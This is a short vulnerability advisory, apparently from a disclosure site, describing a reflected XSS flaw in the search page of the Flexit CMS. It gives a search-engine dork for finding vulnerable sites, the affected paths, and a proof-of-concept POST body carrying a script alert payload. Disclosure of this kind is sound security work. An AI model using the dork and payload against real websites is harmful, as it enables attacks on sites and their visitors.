CMS - Flexit - XSS Reflected

2016.08.03
fr NbSp_ (FR) fr
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Title: XSS vuln in Flexit ! Author: NETFIS Date: 02/08/2016 Download Site: https://dotclear.org/download Vendor: NETFIS Vendor Notified: 02/08/2016 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Description : FlexIT est une offre associant des outils et des services pour vous permettre de créer et de gérer votre site Internet professionnel, sans connaissance technique particulière. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Vulnerability : Dork : intext:"Imaginé par NEFTIS - CMS : Flexit©" This XSS is on the search engine here : /fr/recherche.html or here : /fr/recherche-1.html ! POST DATA : recherche=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page_rech=&clic=1&aff_langue=&debut=1 Or on the search engine : <script>alert(1)</script> -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top